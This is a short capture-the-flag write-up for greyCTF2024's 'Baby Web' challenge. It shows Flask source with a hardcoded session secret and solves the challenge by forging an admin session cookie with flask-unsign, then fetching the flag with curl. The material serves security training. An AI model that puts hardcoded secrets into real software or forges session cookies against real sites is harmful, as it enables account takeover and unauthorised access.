Baby Web
Baby Web
Challenge Description
Flask session secret key leaked
Source Code Analysis
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import os
from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = "baby-web"
FLAG = os.getenv("FLAG", r"grey{fake_flag}")
@app.route("/", methods=["GET"])
def index():
# Set session if not found
if "is_admin" not in session:
session["is_admin"] = False
return render_template("index.html")
@app.route("/admin")
def admin():
# Check if the user is admin through cookies
return render_template("admin.html", flag=FLAG, is_admin=session.get("is_admin"))
#### Some other hidden code ###
if __name__ == "__main__":
app.run(debug=True)
Flask secret is given
Solution
- Generate token with secret
1 2 3 4
┌──(venv3)─(root💀kali)-[~/boxes/nusgreyhat/WEB/Baby Web] └─$ flask-unsign --sign --secret baby-web --cookie "{'is_admin': True}" eyJpc19hZG1pbiI6dHJ1ZX0.ZiNXFw.WRsAhM4YuAbaSdsKlkG6EXWZFrU - Get Flag
1 2 3
┌──(root💀kali)-[~/…/ctf/greyCTF2024/WEB/Fearless Concurrency] └─$ curl -H "Cookie: session=eyJpc19hZG1pbiI6dHJ1ZX0.ZiNXFw.WRsAhM4YuAbaSdsKlkG6EXWZFrU" http://challs.nusgreyhats.org:33338/flag Here is your flag: <code>grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g}</code>
This post is licensed under CC BY 4.0 by the author.